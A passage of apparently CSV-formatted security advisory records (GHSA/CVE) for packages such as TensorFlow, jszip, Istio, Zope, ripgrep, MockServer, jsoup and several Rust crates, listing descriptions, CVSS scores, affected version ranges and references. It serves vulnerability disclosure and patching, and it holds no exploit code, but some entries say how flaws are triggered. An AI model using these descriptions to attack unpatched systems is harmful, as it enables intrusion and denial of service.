'2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4xfp-4pfp-89wg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37656'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1071f554dbd09f7e101324d366eec5f4fe5a3ece'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:07:20Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-jg8v-48h5-wgxg,2023-09-12T19:23:56Z,2021-08-10T16:02:18Z,,['CVE-2021-23413'],jszip Vulnerable to Prototype Pollution,"This affects the package jszip before 3.7.0. Crafting a new zip file with filenames set to Object prototype values (e.g `__proto__`, `toString`, etc) results in a returned object with a modified prototype instance.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'jszip'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.7.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'jszip'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23413'}, {'type': 'WEB', 'url': 'https://github.com/Stuk/jszip/pull/766'}, {'type': 'WEB', 'url': 'https://github.com/Stuk/jszip/commit/22357494f424178cb416cdb7d93b26dd4f824b36'}, {'type': 'PACKAGE', 'url': 'https://github.com/Stuk/jszip'}, {'type': 'WEB', 'url': 'https://github.com/Stuk/jszip/blob/master/lib/object.js%23L88'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1251499'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1251498'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSZIP-1251497'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T22:15:49Z', 'nvd_published_at': '2021-07-25T13:15:00Z'}" +1.4.0,GHSA-8892-84wf-cg8f,2023-06-13T21:01:55Z,2021-08-25T21:00:16Z,,[],SyncChannel can move 'T: !Send' to other threads,"Affected versions of this crate unconditionally implement Send/Sync for `SyncChannel`. `SyncChannel` doesn't provide access to `&T` but merely serves as a channel that consumes and returns owned `T`. Users can create UB in safe Rust by sending `T: !Send` to other threads with `SyncChannel::send/recv` APIs. Using `T = Arc` allows to create data races (which can lead to memory corruption), and using `T = MutexGuard` allows to unlock a mutex from a thread that didn't lock the mutex. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'signal-simple'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kitsuneninetails/signal-rust/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/kitsuneninetails/signal-rust/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0126.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T18:04:55Z', 'nvd_published_at': None}" +1.4.0,GHSA-hqxw-mm44-gc4r,2022-08-15T20:04:30Z,2021-08-30T16:16:14Z,,['CVE-2021-39156'],Istio Fragments in Path May Lead to Authorization Policy Bypass,"### Impact +Istio 1.11.0, 1.10.3 and below, and 1.9.7 and below contain a remotely exploitable vulnerability where an HTTP request with `#fragment` in the path may bypass Istio’s URI path based authorization policies. + +### Patches +* Istio 1.11.1 and above +* Istio 1.10.4 and above +* Istio 1.9.8 and above + +### Workarounds +A Lua filter may be written to normalize the path. This is similar to the Path normalization presented in the [Security Best Practices](https://istio.io/latest/docs/ops/best-practices/security/#case-normalization) guide. + +### References +More details can be found in the [Istio Security Bulletin](https://istio.io/latest/news/security/istio-security-2021-008) + +### For more information +If you have any questions or comments about this advisory, please email us at istio-security-vulnerability-reports@googlegroups.com +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'istio.io/istio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'istio.io/istio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'istio.io/istio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.1'}]}], 'versions': ['1.11.0']}]","[{'type': 'WEB', 'url': 'https://github.com/istio/istio/security/advisories/GHSA-hqxw-mm44-gc4r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39156'}, {'type': 'PACKAGE', 'url': 'https://github.com/istio/istio'}, {'type': 'WEB', 'url': 'https://istio.io/latest/news/security/istio-security-2021-008'}]","{'cwe_ids': ['CWE-706', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T22:28:17Z', 'nvd_published_at': '2021-08-24T23:15:00Z'}" +1.4.0,GHSA-77m6-x95j-75r5,2023-06-13T22:07:15Z,2021-08-25T20:58:58Z,,['CVE-2020-36439'],Data races in ticketed_lock,Affected versions of this crate unconditionally implemented Send for ReadTicket & WriteTicket. This allows to send non-Send T to other threads. This can allows creating data races by cloning types with internal mutability and sending them to other threads (as T of ReadTicket/WriteTicket). Such data races can cause memory corruption or other undefined behavior. The flaw was corrected in commit `a986a93` by adding T: Send bounds to Send impls of ReadTicket/WriteTicket.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ticketed_lock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36439'}, {'type': 'WEB', 'url': 'https://github.com/kvark/ticketed_lock/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/kvark/ticketed_lock/commit/a986a9335d591fa5c826157d1674d47aa525357f'}, {'type': 'PACKAGE', 'url': 'https://github.com/kvark/ticketed_lock/'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/ticketed_lock/RUSTSEC-2020-0119.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0119.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T22:40:34Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-x7vr-c387-8w57,2023-06-13T18:21:10Z,2021-08-25T21:01:31Z,,['CVE-2020-25574'],Integer Overflow/Infinite Loop in the http crate,"HeaderMap::reserve() used usize::next_power_of_two() to calculate the increased capacity. However, next_power_of_two() silently overflows to 0 if given a sufficiently large number in release mode. + +If the map was not empty when the overflow happens, the library will invoke self.grow(0) and start infinite probing. This allows an attacker who controls the argument to reserve() to cause a potential denial of service (DoS). + +The flaw was corrected in 0.1.20 release of http crate.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'http'}, 'ecosystem_specific': {'affected_functions': ['http::header::HeaderMap::reserve']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25574'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/http/issues/352'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/http'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0033.html'}]","{'cwe_ids': ['CWE-190', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:47:31Z', 'nvd_published_at': '2020-09-14T19:15:00Z'}" +1.4.0,GHSA-g4gq-j4p2-j8fr,2021-08-30T23:21:29Z,2021-08-05T17:00:37Z,,['CVE-2021-32811'],Remote Code Execution via Script (Python) objects under Python 3,"### Impact +Background: The optional add-on package `Products.PythonScripts` adds `Script (Python)` to the list of content items a user can add to the Zope object database. Inside these scripts users can write Python code that is executed when rendered through the web. The code environment in these script objects is limited, it relies on the `RestrictedPython` package to provide a ""safe"" subset of Python instructions as well as the `AccessControl` package that defines security policies for execution in the context of a Zope application. + +Recently the `AccessControl` package was updated to fix a remote code execution security issue. A link to the security advisory is provided in the References section below. The bug tightens the `AccessControl` security policies for Zope by blocking access to unsafe classes inside the Python `string` module. + +You are only affected if the following are true: + +- You use Python 3 for your Zope deployment (Zope 4 on Python 2 is not affected) +- You run Zope 4 below version 4.6.3 or Zope 5 below version 5.3 +- You have installed the optional `Products.PythonScripts` add-on package + +By default, you need to have the admin-level Zope ""Manager"" role to add or edit Script (Python) objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web - which would be a very unusual configuration to begin with - are at risk. + +### Patches +The problem has been fixed in `AccessControl` versions 4.3 and 5.2. Zope releases 4.6.3 and 5.3 now require these new `AccessControl` releases. + +### Workarounds +A site administrator can restrict adding/editing Script (Python) objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope. + +### References +* [AccessControl security advisory GHSA-qcx9-j53g-ccgf](https://github.com/zopefoundation/AccessControl/security/advisories/GHSA-qcx9-j53g-ccgf) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [Zope issue tracker](https://github.com/zopefoundation/Zope/issues) +* Email us at [security@plone.org](mailto:security@plone.org) + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0'}, {'fixed': '4.6.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/AccessControl/security/advisories/GHSA-qcx9-j53g-ccgf'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-g4gq-j4p2-j8fr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32811'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/commit/f72a18dda8e9bf2aedb46168761668464a4be988'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/Zope'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T22:57:25Z', 'nvd_published_at': '2021-08-02T22:15:00Z'}" +1.4.0,GHSA-g4xg-fxmg-vcg5,2021-09-07T21:16:08Z,2021-08-05T19:31:55Z,,['CVE-2021-3013'],OS command injection in ripgrep,ripgrep before 13 on Windows allows attackers to trigger execution of arbitrary programs from the current working directory via the -z/--search-zip or --pre flag.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ripgrep'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '13.0.0'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'grep-cli'}, 'ecosystem_specific': {'affected_functions': ['grep_cli::DecompressionReader::new']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3013'}, {'type': 'WEB', 'url': 'https://github.com/BurntSushi/ripgrep/issues/1773'}, {'type': 'PACKAGE', 'url': 'https://github.com/BurntSushi/ripgrep'}, {'type': 'WEB', 'url': 'https://github.com/BurntSushi/ripgrep/blob/e48a17e1891e1ea9dd06ba0e48d5fb140ca7c0c4/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/BurntSushi/ripgrep/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/BurntSushi/ripgrep/blob/master/CHANGELOG.md#1300-2021-06-12'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0071.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:32:57Z', 'nvd_published_at': '2021-06-11T12:15:00Z'}" +1.4.0,GHSA-c9rv-3jmq-527w,2023-06-13T17:09:32Z,2021-08-25T20:49:50Z,,['CVE-2020-35918'],Unexpected panic when decoding tokens in branca,"Prior to 0.10.0 it was possible to have both decoding functions panic unexpectedly, by supplying tokens with an incorrect base62 encoding. +The documentation stated that an error should have been reported instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'branca'}, 'ecosystem_specific': {'affected_functions': ['branca::Branca::decode', 'branca::decode']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35918'}, {'type': 'WEB', 'url': 'https://github.com/return/branca/issues/24'}, {'type': 'WEB', 'url': 'https://github.com/tuupola/branca-spec/issues/22'}, {'type': 'WEB', 'url': 'https://github.com/return/branca/commit/7da3274bd99b05dce9c3f9b4b129d0145c71820b'}, {'type': 'PACKAGE', 'url': 'https://github.com/return/branca'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0075.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:50:27Z', 'nvd_published_at': '2020-12-31T09:15:00Z'}" +1.4.0,GHSA-m72m-mhq2-9p6c,2022-02-08T20:59:16Z,2021-08-23T19:42:38Z,,['CVE-2021-37714'],Uncaught Exception in jsoup,"### Impact +_What kind of vulnerability is it? Who is impacted?_ +Those using jsoup to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ +Users should upgrade to jsoup 1.14.2 + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ +Users may rate limit input parsing. Users should limit the size of inputs based on system resources. Users should implement thread watchdogs to cap and timeout parse runtimes. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jsoup:jsoup'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37714'}, {'type': 'PACKAGE', 'url': 'https://github.com/jhy/jsoup'}, {'type': 'WEB', 'url': 'https://jsoup.org/news/release-1.14.1'}, {'type': 'WEB', 'url': 'https://jsoup.org/news/release-1.14.2'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r215009dbf7467a9f6506d0c0024cb36cad30071010e62c9352cfaaf0@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r377b93d79817ce649e9e68b3456e6f499747ef1643fa987b342e082e@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3d71f18adb78e50f626dde689161ca63d3b7491bd9718fcddfaecba7@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r50e9c9466c592ca9d707a5dea549524d19e3287da08d8392f643960e@%3Cissues.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r685c5235235ad0c26e86d0ee987fb802c9675de6081dbf0516464e0b@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r97404676a5cf591988faedb887d64e278f522adcaa823d89ca69defe@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc3354080fc67fb50b45b3c2d12dc4ca2a3c1c78dad3d3ba012c038aa@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0022/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-248', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:20:30Z', 'nvd_published_at': '2021-08-18T15:15:00Z'}" +1.4.0,GHSA-29hg-r7c7-54fr,2021-08-19T17:05:09Z,2021-08-25T20:55:06Z,,['CVE-2021-29933'],Double free in insert_many,An issue was discovered in the insert_many crate through 2021-01-26 for Rust. Elements may be dropped twice if a .next() method panics.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'insert_many'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29933'}, {'type': 'WEB', 'url': 'https://github.com/rphmeier/insert_many/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/rphmeier/insert_many'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0042.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:05:09Z', 'nvd_published_at': None}" +1.4.0,GHSA-m57c-4vvx-gjgq,2021-08-18T17:45:17Z,2021-08-25T20:58:27Z,,['CVE-2019-15546'],Format string vulnerabilities in pancurses,An issue was discovered in the pancurses crate through 0.16.1 for Rust. printw and mvprintw have format string vulnerabilities.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pancurses'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.16.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15546'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/106'}, {'type': 'WEB', 'url': 'https://github.com/ihalila/pancurses/issues/66'}, {'type': 'PACKAGE', 'url': 'https://github.com/ihalila/pancurses'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0005.html'}]","{'cwe_ids': ['CWE-134'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T17:45:17Z', 'nvd_published_at': '2019-08-26T18:15:00Z'}" +1.4.0,GHSA-8r7q-r9mx-35rh,2021-08-19T21:18:40Z,2021-08-25T20:47:18Z,,['CVE-2020-35869'],Mishandling of format strings in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated because rusqlite::trace::log mishandles format strings.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35869'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/2327d3b774927fdf48903c0bdc1ca7ec93c7c8d0'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-134'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:40Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-66p5-j55p-32r9,2021-08-06T16:36:54Z,2021-08-25T21:00:25Z,,[],smallvec creates uninitialized value of any type,"Affected versions of this crate called `mem::uninitialized()` to create values of a user-supplied type `T`. +This is unsound e.g. if `T` is a reference type (which must be non-null and thus may not remain uninitialized). + +The flaw was corrected by avoiding the use of `mem::uninitialized()`, using `MaybeUninit` instead. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'smallvec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.13'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/issues/126'}, {'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/pull/162'}, {'type': 'PACKAGE', 'url': 'https://github.com/servo/rust-smallvec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0018.html'}]","{'cwe_ids': ['CWE-457'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T16:36:54Z', 'nvd_published_at': None}" +1.4.0,GHSA-rfgg-vccr-m46m,2021-08-19T21:20:37Z,2021-08-25T20:45:58Z,,['CVE-2020-25794'],Missing release of memory in sized-chunks,"An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, clone can have a memory-safety issue upon a panic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sized-chunks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25794'}, {'type': 'WEB', 'url': 'https://github.com/bodil/sized-chunks/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodil/sized-chunks'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0041.html'}]","{'cwe_ids': ['CWE-401'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:37Z', 'nvd_published_at': None}" +1.4.0,GHSA-v3cg-h3f6-2242,2022-02-08T21:01:17Z,2021-08-30T16:24:38Z,,['CVE-2021-32827'],Injection in MockServer,"MockServer is open source software which enables easy mocking of any system you integrate with via HTTP or HTTPS. An attacker that can trick a victim into visiting a malicious site while running MockServer locally, will be able to run arbitrary code on the MockServer machine. With an overly broad default CORS configuration MockServer allows any site to send cross-site requests. Additionally, MockServer allows you to create dynamic expectations using Javascript or Velocity templates. Both engines may allow an attacker to execute arbitrary code on-behalf of MockServer. By combining these two issues (Overly broad CORS configuration + Script injection), an attacker could serve a malicious page so that if a developer running MockServer visits it, they will get compromised. For more details including a PoC see the referenced GHSL-2021-059.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mock-server:mockserver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.11.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32827'}, {'type': 'PACKAGE', 'url': 'https://github.com/mock-server/mockserver'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-059-mockserver/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-74', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:35:37Z', 'nvd_published_at': '2021-08-16T21:15:00Z'}" +1.4.0,GHSA-f997-8gxg-r354,2022-05-05T18:16:25Z,2021-08-25T20:58:09Z,,['CVE-2020-36458'],Data races in lexer,"lexer is a plugin based lexical reader.Affected versions of this crate implements Sync for ReaderResult with the trait bound T: Send, E: Send. Since matching on the public enum ReaderResult provides access to &T & &E, allowing data race to a non-Sync type T or E. This can result in a memory corruption when multiple threads concurrently access &T or &E. Suggested fix for the bug is change the trait bounds imposed on T & E to be T: Sync, E: Sync.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lexer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36458'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/nathanfaucett/rs-lexer'}, {'type': 'WEB', 'url': 'https://gitlab.com/nathanfaucett/rs-lexer/-/issues/2'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/lexer/RUSTSEC-2020-0138.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0138.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:18:45Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-8q5c-93vg-c747,2021-08-19T19:03:37Z,2021-08-25T21:00:30Z,2021-08-19T19:03:37Z,[],WITHDRAWN,WITHDRAWN,[],"[{'package': {'ecosystem': 'crates.io', 'name': 'toolshed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.8.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratel-rust/toolshed/issues/12'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratel-rust/toolshed'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0136.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T22:05:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-75cq-g75g-rxff,2021-08-18T22:36:31Z,2021-08-25T21:00:43Z,,['CVE-2020-35900'],use-after-free vulnerability in Rust array-queue,An issue was discovered in the array-queue crate through 2020-09-26 for Rust. A pop_back() call may lead to a use-after-free.,"[{'type': 'CVSS_V3', 'score': 